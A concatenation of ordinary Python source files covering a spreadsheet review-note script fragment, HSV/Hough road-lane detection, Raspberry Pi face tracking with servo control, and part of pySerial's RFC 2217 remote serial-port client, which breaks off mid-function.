workman = xlrd.open_workbook(nestedName + "_rev_800notes.xlsx")
workboy = workman.sheet_by_name('Sheet1')
eightDate = workboy.cell(idx + 1, 9).value
eightMessages = workboy.cell(idx + 1, 10).value
eightMessages = str(eightMessages)[:-2]
eightSentiment = workboy.cell(idx + 1, 7).value
else:
eightDate = "N/A"
eightMessages = "0"
eightSentiment = ""
reviewNote = 'BN={0}; BA={1}; BW=; CB=; CT=; 8N={2} | {3} COMMENTS IN THE PAST YEAR; N/K={4};'.format(busName, busAddy, eightDate, eightMessages, eightSentiment)
worksheet.write(idx + 1, 1, reviewNote)
# Close up Shop!
if website == '2' or website == '3' or website == '4' or website == '5':
driver.close()
workbook.close()
# Determine if file was dragged or not for creation of Dirs.
if dragNDrop == '':
if not os.path.exists('WorkingDir'):
os.makedirs('WorkingDir')
if not os.path.exists('WorkingDir/' + preName):
os.makedirs('WorkingDir/' + preName)
# Was the file originially a CSV?
if prepRev == '.csv':
totalName = preName + '.xlsx'
else:
totalName = preName + prepRev
# If we haven't already moved all of the files, here we go.
if dragNDrop == '':
copyfile(preName + ".xlsx", 'WorkingDir/' + preName + '/' + preName + ".xlsx")
move(preName + siteType, 'WorkingDir/' + preName + '/' + preName
+ siteType)
# Delete the PYC
if os.path.isfile('Harvard.pyc'):
os.remove('Harvard.pyc')
# End Animation.
done = True
print('\nDing! Job Done!')
|
road_model.py
|
import cv2
import numpy as np
import threading
from typing import Union
from openpilot.models.lane_detect.lane_config import BASE_TU, BASE_CU
from openpilot.models.lane_detect.hough_lines import HoughLanesImage
from openpilot.models.lane_detect.lane_models.lane_generator_hough import LaneGeneratorCUHough, LaneGeneratorTUHough, YellowLineSlidersMixin
class HSVFilterMixinOrig:
def _process_X(self, orig_image) -> Union[None, np.ndarray]:
image = orig_image
# crop image
h, w = image.shape[:2]
#image = image[200:h - 20, 20:550]
# create hsv
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
#low_val = (0, 0, 0)
#high_val = (179, 45, 96)
low_val = np.uint8(self._y_vec[:3])
high_val = np.uint8(self._y_vec[3:])
# Threshold the HSV image
mask = cv2.inRange(hsv, low_val, high_val)
# remove noise
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=np.ones((8, 8), dtype=np.uint8))
# close mask
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel=np.ones((20, 20), dtype=np.uint8))
# improve mask by drawing the convexhull
contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
hull = cv2.convexHull(cnt)
cv2.drawContours(mask, [hull], 0, (255), -1)
# erode mask a bit to migitate mask bleed of convexhull
mask = cv2.morphologyEx(mask, cv2.MORPH_ERODE, kernel=np.ones((5, 5), dtype=np.uint8))
# remove this line, used to show intermediate result of masked road
road = cv2.bitwise_and(image, image, mask=mask)
return road
# apply mask to hsv image
road_hsv = cv2.bitwise_and(hsv, hsv, mask=mask)
# set lower and upper color limits
low_val = (0, 0, 102)
high_val = (179, 255, 255)
# Threshold the HSV image
mask2 = cv2.inRange(road_hsv, low_val, high_val)
# apply mask to original image
return cv2.bitwise_and(image, image, mask=mask2)
class HSVFilterMixin1:
"""
HSV params
low_val = (0, 0, 0)
high_val = (179, 45, 96)
"""
ROIS = [(0, 460), (0, 720), (1280, 720), (1280, 460), (840, 260), (400, 260)] # roi vertices
def _process_X(self, orig_image) -> Union[None, np.ndarray]:
image = orig_image
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV) # creates HSV image
low_val = np.uint8(self._y_vec[:3])
high_val = np.uint8(self._y_vec[3:])
# Threshold the HSV image
mask = cv2.inRange(hsv, low_val, high_val)
# remove noise
#mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=np.ones((8, 8), dtype=np.uint8))
# close mask
#mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel=np.ones((20, 20), dtype=np.uint8))
# improve mask by drawing the convexhull
#contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#for cnt in contours:
# hull = cv2.convexHull(cnt)
# cv2.drawContours(mask, [hull], 0, (255), -1)
# erode mask a bit to migitate mask bleed of convexhull
#mask = cv2.morphologyEx(mask, cv2.MORPH_ERODE, kernel=np.ones((5, 5), dtype=np.uint8))
# remove this line, used to show intermediate result of masked road
road = cv2.bitwise_and(image, image, mask=mask)
hough_params = { 'rho': 1
, 'theta': np.pi / 180.
, 'threshold': 30
, 'min_line_len': 20
, 'max_line_gap': 20
, 'gray_range': (150, 255)
, 'canny_range': (100, 200)
, }
cl = HoughLanesImage(road
, roi_vertices=self.ROIS
, hough_params=hough_params )
hough_img = cv2.cvtColor(cl.show_lines(road.shape[:2], pixel_tol=2).astype(np.uint8) * 255, cv2.COLOR_BGR2RGB)
# return cv2.addWeighted(orig_image, 0.6, hough_img, 0.8, 0)
return cv2.addWeighted(road, 0.6, hough_img, 0.8, 0)
# # apply mask to hsv image
# road_hsv = cv2.bitwise_and(hsv, hsv, mask=mask)
# # set lower and upper color limits
# low_val = (0, 0, 102)
# high_val = (179, 255, 255)
# # Threshold the HSV image
# mask2 = cv2.inRange(road_hsv, low_val, high_val)
# # apply mask to original image
# return cv2.bitwise_and(image, image, mask=mask2)
class HSVLineTU(HSVFilterMixin1, LaneGeneratorTUHough ):
# good values for y are
# (0, 175, 0) - (255,255,255)
# (0, 175, 180) - (255,255,255) <- THIS IS CHOSEN
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._y_vec = [0, 175, 180, 255, 255, 255]
class HSVLineCU(HSVFilterMixin1, LaneGeneratorCUHough):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._y_vec = [0, 175, 180, 255, 255, 255]
class HSVLineTUSliders(YellowLineSlidersMixin, HSVLineTU):
""" Yellow line but with sliders.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# add the sliders from Tkinter
sliders_th = threading.Thread(target = lambda : self._sliders())
sliders_th.start()
class HSVLineCUSliders(YellowLineSlidersMixin, HSVLineCU):
""" Yellow line but with sliders.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# add the sliders from Tkinter
sliders_th = threading.Thread(target = lambda : self._sliders())
sliders_th.start()
# examples
def example_2():
# new_image_size = (590, 1640, 3)
batch_size = 32
train_percentage = 0.8
train_generator = HSVLineTUSliders( BASE_TU
, to_train = True
, train_percentage = train_percentage
, batch_size=batch_size
, scale_img= 1.)
train_generator.show_movie_cont()
def example_1():
# new_image_size = (590, 1640, 3)
scale_size = 1.
batch_size = 32
train_percentage = 0.8
train_generator = HSVLineCUSliders( BASE_CU
, to_train = True
, train_percentage = train_percentage
, batch_size=batch_size )
train_generator.show_movie_cont()
example_2()
|
openvino_fd_capture.py
|
import cv2 as cv
import sys
import logging
import time
from picamera.array import PiRGBArray
from picamera import PiCamera
from utils.PCA9685 import PCA9685
from queue import Queue
from threading import Thread
logging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s', level=logging.INFO)
# Load the model
t = time.time()
net = cv.dnn.readNet('models/hello/face-detection-adas-0001.xml', 'models/hello/face-detection-adas-0001.bin')
logging.info("load model cost %f" % (time.time() - t))
# Specify target device
net.setPreferableTarget(cv.dnn.DNN_TARGET_MYRIAD)
screen_size = (640, 480)
def run_camera(q):
# Load Camera
camera = PiCamera()
camera.resolution = (640, 480)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(640, 480))
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image, then initialize the timestamp
# and occupied/unoccupied text
image = frame.array
# Prepare input blob and perform an inference
t = time.time()
blob = cv.dnn.blobFromImage(image, size=(672, 384), ddepth=cv.CV_8U)
net.setInput(blob)
out = net.forward()
logging.debug("inference cost %f" % (time.time() - t))
# Draw detected faces on the image
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
xmin = int(detection[3] * image.shape[1])
ymin = int(detection[4] * image.shape[0])
xmax = int(detection[5] * image.shape[1])
ymax = int(detection[6] * image.shape[0])
x_mid = (xmin+xmax)/2
y_mid = (ymin+ymax)/2
if confidence > 0.5:
if ymin > image.shape[1]/2:
q.put("down")
if ymax < image.shape[1]/2:
q.put("up")
if xmin > image.shape[0]/2:
q.put("right")
if xmax < image.shape[0]/2:
q.put("left")
logging.debug("xmin=%s, ymin=%s, xmax=%s, ymax=%s"%(xmin, ymin, xmax, ymax))
cv.rectangle(image, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))
# Save the frame to an image file
# cv.imwrite('out.png', image)
# show the frame
cv.imshow("Frame", image)
key = cv.waitKey(1) & 0xFF
logging.debug("key=%s" % key)
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
# if the `q` key was pressed, break from the loop
if key == 81:
q.put("left")
if key == 82:
q.put("up")
if key == 83:
q.put("right")
if key == 84:
q.put("down")
if key == ord("q"):
q.put("exit")
break
def run_move(q):
channel_yaw = 7
channel_pitch = 15
pos_yaw = 1400
pos_pitch = 1400
default_step = 100
max_pos = 2400
min_pos = 600
# init pwm
pwm = PCA9685(0x40)
pwm.setPWMFreq(50)
pwm.setServoPulse(channel_yaw, pos_yaw)
pwm.setServoPulse(channel_pitch, pos_pitch)
while True:
data = q.get()
logging.info("move=%s" % str(data))
if data == 'exit':
break
elif data == "left":
pos_yaw += default_step
pos_yaw = min(max(min_pos, pos_yaw), max_pos)
pwm.setServoPulse(channel_yaw, pos_yaw)
elif data == "right":
pos_yaw -= default_step
pos_yaw = min(max(min_pos, pos_yaw), max_pos)
pwm.setServoPulse(channel_yaw, pos_yaw)
elif data == "up":
pos_pitch += default_step
pos_pitch = min(max(min_pos, pos_pitch), max_pos)
pwm.setServoPulse(channel_pitch, pos_pitch)
elif data == "down":
pos_pitch -= default_step
pos_pitch = min(max(min_pos, pos_pitch), max_pos)
pwm.setServoPulse(channel_pitch, pos_pitch)
logging.debug("pos_yaw=%s,pos_pitch=%s" % (pos_yaw, pos_pitch))
q = Queue()
t1 = Thread(target=run_move, args=(q,))
t2 = Thread(target=run_camera, args=(q,))
t1.start()
t2.start()
|
rfc2217.py
|
#! python
#
# This module implements a RFC2217 compatible client. RF2217 descibes a
# protocol to access serial ports over TCP/IP and allows setting the baud rate,
# modem control lines etc.
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2001-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
# TODO:
# - setting control line -> answer is not checked (had problems with one of the
# severs). consider implementing a compatibility mode flag to make check
# conditional
# - write timeout not implemented at all
# ###########################################################################
# observations and issues with servers
# ===========================================================================
# sredird V2.2.1
# - http://www.ibiblio.org/pub/Linux/system/serial/ sredird-2.2.2.tar.gz
# - does not acknowledge SET_CONTROL (RTS/DTR) correctly, always responding
# [105 1] instead of the actual value.
# - SET_BAUDRATE answer contains 4 extra null bytes -> probably for larger
# numbers than 2**32?
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: while true; do nc -l -p 7000 -c "sredird debug /dev/ttyUSB0 /var/lock/sredir"; done
# ===========================================================================
# telnetcpcd (untested)
# - http://ftp.wayne.edu/kermit/sredird/telnetcpcd-1.09.tar.gz
# - To get the signature [COM_PORT_OPTION] w/o data has to be sent.
# ===========================================================================
# ser2net
# - does not negotiate BINARY or COM_PORT_OPTION for his side but at least
# acknowledges that the client activates these options
# - The configuration may be that the server prints a banner. As this client
# implementation does a flushInput on connect, this banner is hidden from
# the user application.
# - NOTIFY_MODEMSTATE: the poll interval of the server seems to be one
# second.
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: run ser2net daemon, in /etc/ser2net.conf:
# 2000:telnet:0:/dev/ttyS0:9600 remctl banner
# ###########################################################################
# How to identify ports? pySerial might want to support other protocols in the
# future, so lets use an URL scheme.
# for RFC2217 compliant servers we will use this:
# rfc2217://<host>:<port>[?option[&option...]]
#
# options:
# - "logging" set log level print diagnostic messages (e.g. "logging=debug")
# - "ign_set_control": do not look at the answers to SET_CONTROL
# - "poll_modem": issue NOTIFY_MODEMSTATE requests when CTS/DTR/RI/CD is read.
# Without this option it expects that the server sends notifications
# automatically on change (which most servers do and is according to the
# RFC).
# the order of the options is not relevant
import logging
import socket
import struct
import threading
import time
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
import Queue
except ImportError:
import queue as Queue
import serial
from serial.serialutil import SerialBase, SerialException, to_bytes, \
iterbytes, portNotOpenError, Timeout
# port string is expected to be something like this:
# rfc2217://host:port
# host may be an IP or including domain, whatever.
# port is 0...65535
# map log level names to constants. used in from_url()
LOGGER_LEVELS = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
}
# telnet protocol characters
SE = b'\xf0' # Subnegotiation End
NOP = b'\xf1' # No Operation
DM = b'\xf2' # Data Mark
BRK = b'\xf3' # Break
IP = b'\xf4' # Interrupt process
AO = b'\xf5' # Abort output
AYT = b'\xf6' # Are You There
EC = b'\xf7' # Erase Character
EL = b'\xf8' # Erase Line
GA = b'\xf9' # Go Ahead
SB = b'\xfa' # Subnegotiation Begin
WILL = b'\xfb'
WONT = b'\xfc'
DO = b'\xfd'
DONT = b'\xfe'
IAC = b'\xff' # Interpret As Command
IAC_DOUBLED = b'\xff\xff'
# selected telnet options
BINARY = b'\x00' # 8-bit data path
ECHO = b'\x01' # echo
SGA = b'\x03' # suppress go ahead
# RFC2217
COM_PORT_OPTION = b'\x2c'
# Client to Access Server
SET_BAUDRATE = b'\x01'
SET_DATASIZE = b'\x02'
SET_PARITY = b'\x03'
SET_STOPSIZE = b'\x04'
SET_CONTROL = b'\x05'
NOTIFY_LINESTATE = b'\x06'
NOTIFY_MODEMSTATE = b'\x07'
FLOWCONTROL_SUSPEND = b'\x08'
FLOWCONTROL_RESUME = b'\x09'
SET_LINESTATE_MASK = b'\x0a'
SET_MODEMSTATE_MASK = b'\x0b'
PURGE_DATA = b'\x0c'
SERVER_SET_BAUDRATE = b'\x65'
SERVER_SET_DATASIZE = b'\x66'
SERVER_SET_PARITY = b'\x67'
SERVER_SET_STOPSIZE = b'\x68'
SERVER_SET_CONTROL = b'\x69'
SERVER_NOTIFY_LINESTATE = b'\x6a'
SERVER_NOTIFY_MODEMSTATE = b'\x6b'
SERVER_FLOWCONTROL_SUSPEND = b'\x6c'
SERVER_FLOWCONTROL_RESUME = b'\x6d'
SERVER_SET_LINESTATE_MASK = b'\x6e'
SERVER_SET_MODEMSTATE_MASK = b'\x6f'
SERVER_PURGE_DATA = b'\x70'
RFC2217_ANSWER_MAP = {
SET_BAUDRATE: SERVER_SET_BAUDRATE,
SET_DATASIZE: SERVER_SET_DATASIZE,
SET_PARITY: SERVER_SET_PARITY,
SET_STOPSIZE: SERVER_SET_STOPSIZE,
SET_CONTROL: SERVER_SET_CONTROL,
NOTIFY_LINESTATE: SERVER_NOTIFY_LINESTATE,
NOTIFY_MODEMSTATE: SERVER_NOTIFY_MODEMSTATE,
FLOWCONTROL_SUSPEND: SERVER_FLOWCONTROL_SUSPEND,
FLOWCONTROL_RESUME: SERVER_FLOWCONTROL_RESUME,
SET_LINESTATE_MASK: SERVER_SET_LINESTATE_MASK,
SET_MODEMSTATE_MASK: SERVER_SET_MODEMSTATE_MASK,
PURGE_DATA: SERVER_PURGE_DATA,
}
SET_CONTROL_REQ_FLOW_SETTING = b'\x00' # Request Com Port Flow Control Setting (outbound/both)
SET_CONTROL_USE_NO_FLOW_CONTROL = b'\x01' # Use No Flow Control (outbound/both)
SET_CONTROL_USE_SW_FLOW_CONTROL = b'\x02' # Use XON/XOFF Flow Control (outbound/both)
SET_CONTROL_USE_HW_FLOW_CONTROL = b'\x03' # Use HARDWARE Flow Control (outbound/both)
SET_CONTROL_REQ_BREAK_STATE = b'\x04' # Request BREAK State
SET_CONTROL_BREAK_ON = b'\x05' # Set BREAK State ON
SET_CONTROL_BREAK_OFF = b'\x06' # Set BREAK State OFF
SET_CONTROL_REQ_DTR = b'\x07' # Request DTR Signal State
SET_CONTROL_DTR_ON = b'\x08' # Set DTR Signal State ON
SET_CONTROL_DTR_OFF = b'\x09' # Set DTR Signal State OFF
SET_CONTROL_REQ_RTS = b'\x0a' # Request RTS Signal State
SET_CONTROL_RTS_ON = b'\x0b' # Set RTS Signal State ON
SET_CONTROL_RTS_OFF = b'\x0c' # Set RTS Signal State OFF
SET_CONTROL_REQ_FLOW_SETTING_IN = b'\x0d' # Request Com Port Flow Control Setting (inbound)
SET_CONTROL_USE_NO_FLOW_CONTROL_IN = b'\x0e' # Use No Flow Control (inbound)
SET_CONTROL_USE_SW_FLOW_CONTOL_IN = b'\x0f' # Use XON/XOFF Flow Control (inbound)
SET_CONTROL_USE_HW_FLOW_CONTOL_IN = b'\x10' # Use HARDWARE Flow Control (inbound)
SET_CONTROL_USE_DCD_FLOW_CONTROL = b'\x11' # Use DCD Flow Control (outbound/both)
SET_CONTROL_USE_DTR_FLOW_CONTROL = b'\x12' # Use DTR Flow Control (inbound)
SET_CONTROL_USE_DSR_FLOW_CONTROL = b'\x13' # Use DSR Flow Control (outbound/both)
LINESTATE_MASK_TIMEOUT = 128 # Time-out Error
LINESTATE_MASK_SHIFTREG_EMPTY = 64 # Transfer Shift Register Empty
LINESTATE_MASK_TRANSREG_EMPTY = 32 # Transfer Holding Register Empty
LINESTATE_MASK_BREAK_DETECT = 16 # Break-detect Error
LINESTATE_MASK_FRAMING_ERROR = 8 # Framing Error
LINESTATE_MASK_PARTIY_ERROR = 4 # Parity Error
LINESTATE_MASK_OVERRUN_ERROR = 2 # Overrun Error
LINESTATE_MASK_DATA_READY = 1 # Data Ready
MODEMSTATE_MASK_CD = 128 # Receive Line Signal Detect (also known as Carrier Detect)
MODEMSTATE_MASK_RI = 64 # Ring Indicator
MODEMSTATE_MASK_DSR = 32 # Data-Set-Ready Signal State
MODEMSTATE_MASK_CTS = 16 # Clear-To-Send Signal State
MODEMSTATE_MASK_CD_CHANGE = 8 # Delta Receive Line Signal Detect
MODEMSTATE_MASK_RI_CHANGE = 4 # Trailing-edge Ring Detector
MODEMSTATE_MASK_DSR_CHANGE = 2 # Delta Data-Set-Ready
MODEMSTATE_MASK_CTS_CHANGE = 1 # Delta Clear-To-Send
PURGE_RECEIVE_BUFFER = b'\x01' # Purge access server receive data buffer
PURGE_TRANSMIT_BUFFER = b'\x02' # Purge access server transmit data buffer
PURGE_BOTH_BUFFERS = b'\x03' # Purge both the access server receive data
# buffer and the access server transmit data buffer
RFC2217_PARITY_MAP = {
serial.PARITY_NONE: 1,
serial.PARITY_ODD: 2,
serial.PARITY_EVEN: 3,
serial.PARITY_MARK: 4,
serial.PARITY_SPACE: 5,
}
RFC2217_REVERSE_PARITY_MAP = dict((v, k) for k, v in RFC2217_PARITY_MAP.items())
RFC2217_STOPBIT_MAP = {
serial.STOPBITS_ONE: 1,
serial.STOPBITS_ONE_POINT_FIVE: 3,
serial.STOPBITS_TWO: 2,
}
RFC2217_REVERSE_STOPBIT_MAP = dict((v, k) for k, v in RFC2217_STOPBIT_MAP.items())
# Telnet filter states
M_NORMAL = 0
M_IAC_SEEN = 1
M_NEGOTIATE = 2
# TelnetOption and TelnetSubnegotiation states
REQUESTED = 'REQUESTED'
ACTIVE = 'ACTIVE'
INACTIVE = 'INACTIVE'
REALLY_INACTIVE = 'REALLY_INACTIVE'
class TelnetOption(object):
"""Manage a single telnet option, keeps track of DO/DONT WILL/WONT."""
def __init__(self, connection, name, option, send_yes, send_no, ack_yes,
ack_no, initial_state, activation_callback=None):
"""\
Initialize option.
:param connection: connection used to transmit answers
:param name: a readable name for debug outputs
:param send_yes: what to send when option is to be enabled.
:param send_no: what to send when option is to be disabled.
:param ack_yes: what to expect when remote agrees on option.
:param ack_no: what to expect when remote disagrees on option.
:param initial_state: options initialized with REQUESTED are tried to
be enabled on startup. use INACTIVE for all others.
"""
self.connection = connection
self.name = name
self.option = option
self.send_yes = send_yes
self.send_no = send_no
self.ack_yes = ack_yes
self.ack_no = ack_no
self.state = initial_state
self.active = False
self.activation_callback = activation_callback
def __repr__(self):
"""String for debug outputs"""
return "{o.name}:{o.active}({o.state})".format(o=self)
def process_incoming(self, command):
"""\
A DO/DONT/WILL/WONT was received for this option, update state and
answer when needed.
"""
if command == self.ack_yes:
if self.state is REQUESTED:
self.state = ACTIVE
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is ACTIVE:
pass
elif self.state is INACTIVE:
self.state = ACTIVE
self.connection.telnet_send_option(self.send_yes, self.option)
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is REALLY_INACTIVE:
self.connection.telnet_send_option(self.send_no, self.option)
else:
raise ValueError('option in illegal state {!r}'.format(self))
elif command == self.ack_no:
if self.state is REQUESTED:
self.state = INACTIVE
self.active = False
elif self.state is ACTIVE:
self.state = INACTIVE
self.connection.telnet_send_option(self.send_no, self.option)
self.active = False
elif self.state is INACTIVE:
pass
elif self.state is REALLY_INACTIVE:
pass
else:
raise ValueError('option in illegal state {!r}'.format(self))
class TelnetSubnegotiation(object):
"""\
A object to handle subnegotiation of options. In this case actually
sub-sub options for RFC 2217. It is used to track com port options.
"""
def __init__(self, connection, name, option, ack_option=None):
if ack_option is None:
ack_option = option
self.connection = connection
self.name = name
self.option = option
self.value = None
self.ack_option = ack_option
self.state = INACTIVE
def __repr__(self):
"""String for debug outputs."""
return "{sn.name}:{sn.state}".format(sn=self)
def set(self, value):
"""\
Request a change of the value. a request is sent to the server. if
the client needs to know if the change is performed he has to check the
state of this object.
"""
self.value = value
self.state = REQUESTED
self.connection.rfc2217_send_subnegotiation(self.option, self.value)
if self.connection.logger:
self.connection.logger.debug("SB Requesting {} -> {!r}".format(self.name, self.value))
def is_ready(self):
"""\
Check if answer from server has been received. when server rejects
the change, raise a ValueError.
"""
if self.state == REALLY_INACTIVE:
raise ValueError("remote rejected value for option {!r}".format(self.name))
return self.state == ACTIVE
# add property to have a similar interface as TelnetOption
active = property(is_ready)
def wait(self, timeout=3):
"""\
Wait until the subnegotiation has been acknowledged or timeout. It
can also throw a value error when the answer from the server does not
match the value sent.
"""
timeout_timer = Timeout(timeout)
while not timeout_timer.expired():
time.sleep(0.05) # prevent 100% CPU load
if self.is_ready():
break
else:
raise SerialException("timeout while waiting for option {!r}".format(self.name))
def check_answer(self, suboption):
"""\
Check an incoming subnegotiation block. The parameter already has
cut off the header like sub option number and com port option value.
"""
if self.value == suboption[:len(self.value)]:
self.state = ACTIVE
else:
# error propagation done in is_ready
self.state = REALLY_INACTIVE
if self.connection.logger:
self.connection.logger.debug("SB Answer {} -> {!r} -> {}".format(self.name, suboption, self.state))
class Serial(SerialBase):
"""Serial port implementation for RFC 2217 remote serial ports."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def __init__(self, *args, **kwargs):
self._thread = None
self._socket = None
self._linestate = 0
self._modemstate = None
self._modemstate_timeout = Timeout(-1)
self._remote_suspend_flow = False
self._write_lock = None
self.logger = None
self._ignore_set_control_answer = False
self._poll_modem_state = False
self._network_timeout = 3
self._telnet_options = None
self._rfc2217_port_settings = None
self._rfc2217_options = None
self._read_buffer = None
super(Serial, self).__init__(*args, **kwargs) # must be last call in case of auto-open
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
self.logger = None
self._ignore_set_control_answer = False
self._poll_modem_state = False
self._network_timeout = 3
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self.is_open:
raise SerialException("Port is already open.")
try:
self._socket = socket.create_connection(self.from_url(self.portstr), timeout=5) # XXX good value?
self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except Exception as msg:
self._socket = None
raise SerialException("Could not open port {}: {}".format(self.portstr, msg))
# use a thread save queue as buffer. it also simplifies implementing
# the read timeout
self._read_buffer = Queue.Queue()
# to ensure that user writes does not interfere with internal
# telnet/rfc2217 options establish a lock
self._write_lock = threading.Lock()
# name the following separately so that, below, a check can be easily done
mandadory_options = [
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED),
]
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, REQUESTED),
] + mandadory_options
# RFC 2217 specific states
# COM port settings
self._rfc2217_port_settings = {
'baudrate': TelnetSubnegotiation(self, 'baudrate', SET_BAUDRATE, SERVER_SET_BAUDRATE),
'datasize': TelnetSubnegotiation(self, 'datasize', SET_DATASIZE, SERVER_SET_DATASIZE),
'parity': TelnetSubnegotiation(self, 'parity', SET_PARITY, SERVER_SET_PARITY),
'stopsize': TelnetSubnegotiation(self, 'stopsize', SET_STOPSIZE, SERVER_SET_STOPSIZE),
}
# There are more subnegotiation objects, combine all in one dictionary
# for easy access
self._rfc2217_options = {
'purge': TelnetSubnegotiation(self, 'purge', PURGE_DATA, SERVER_PURGE_DATA),
'control': TelnetSubnegotiation(self, 'control', SET_CONTROL, SERVER_SET_CONTROL),
}
self._rfc2217_options.update(self._rfc2217_port_settings)
# cache for line and modem states that the server sends to us
self._linestate = 0
self._modemstate = None
self._modemstate_timeout = Timeout(-1)
# RFC 2217 flow control between server and client
self._remote_suspend_flow = False
self.is_open = True
self._thread = threading.Thread(target=self._telnet_read_loop)
self._thread.setDaemon(True)
self._thread.setName('pySerial RFC 2217 reader thread for {}'.format(self._port))
self._thread.start()
try: # must clean-up if open fails
# negotiate Telnet/RFC 2217 -> send initial requests
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnet_send_option(option.send_yes, option.option)
# now wait until important options are negotiated
timeout = Timeout(self._network_timeout)
while not timeout.expired():
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in mandadory_options) == sum(o.state != INACTIVE for o in mandadory_options):
break
else:
raise SerialException(
"Remote does not seem to support RFC2217 or BINARY mode {!r}".format(mandadory_options))
if self.logger:
self.logger.info("Negotiated options: {}".format(self._telnet_options))
# fine, go on, set RFC 2271 specific things
self._reconfigure_port()
# all things set up get, now a clean start
if not self._dsrdtr:
self._update_dtr_state()
if not self._rtscts:
self._update_rts_state()
self.reset_input_buffer()
self.reset_output_buffer()
except:
self.close()
raise
def _reconfigure_port(self):
"""Set communication parameters on opened port."""
if self._socket is None:
raise SerialException("Can only operate on open ports")
# if self._timeout != 0 and self._interCharTimeout is not None:
# XXX
if self._write_timeout is not None:
raise NotImplementedError('write_timeout is currently not supported')
# XXX
# Setup the connection
# to get good performance, all parameter changes are sent first...
if not 0 < self._baudrate < 2 ** 32:
raise ValueError("invalid baudrate: {!r}".format(self._baudrate))
self._rfc2217_port_settings['baudrate'].set(struct.pack(b'!I', self._baudrate))
self._rfc2217_port_settings['datasize'].set(struct.pack(b'!B', self._bytesize))
self._rfc2217_port_settings['parity'].set(struct.pack(b'!B', RFC2217_PARITY_MAP[self._parity]))
self._rfc2217_port_settings['stopsize'].set(struct.pack(b'!B', RFC2217_STOPBIT_MAP[self._stopbits]))
# and now wait until parameters are active
items = self._rfc2217_port_settings.values()
if self.logger:
self.logger.debug("Negotiating settings: {}".format(items))
timeout = Timeout(self._network_timeout)
while not timeout.expired():
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in items) == len(items):
break
else:
raise SerialException("Remote does not accept parameter change (RFC2217): {!r}".format(items))
if self.logger:
self.logger.info("Negotiated settings: {}".format(items))
if self._rtscts and self._xonxoff:
raise ValueError('xonxoff and rtscts together are not supported')
elif self._rtscts:
self.rfc2217_set_control(SET_CONTROL_USE_HW_FLOW_CONTROL)
elif self._xonxoff:
self.rfc2217_set_control(SET_CONTROL_USE_SW_FLOW_CONTROL)
else:
self.rfc2217_set_control(SET_CONTROL_USE_NO_FLOW_CONTROL)
def close(self):
"""Close port"""
self.is_open = False
if self._socket:
try:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
except:
# ignore errors.
pass
if self._thread:
self._thread.join(7) # XXX more than socket timeout
self._thread = None
# in case of quick reconnects, give the server some time
time.sleep(0.3)
self._socket = None
def from_url(self, url):
"""\
extract host and port from an URL string, other settings are extracted
an stored in instance
"""
parts = urlparse.urlsplit(url)
if parts.scheme != "rfc2217":
raise SerialException(
'expected a string in the form '
'"rfc2217://<host>:<port>[?option[&option...]]": '
'not starting with rfc2217:// ({!r})'.format(parts.scheme))
try:
# process options now, directly altering self
for option, values in urlparse.parse_qs(parts.query, True).items():
if option == 'logging':
logging.basicConfig() # XXX is that good to call it here?
self.logger = logging.getLogger('pySerial.rfc2217')
self.logger.setLevel(LOGGER_LEVELS[values[0]])
self.logger.debug('enabled logging')
elif option == 'ign_set_control':
self._ignore_set_control_answer = True
elif option == 'poll_modem':
self._poll_modem_state = True
elif option == 'timeout':
self._network_timeout = float(values[0])
else:
raise ValueError('unknown option: {!r}'.format(option))
if not 0 <= parts.port < 65536:
raise ValueError("port not in range 0...65535")
except ValueError as e:
raise SerialException(
'expected a string in the form '
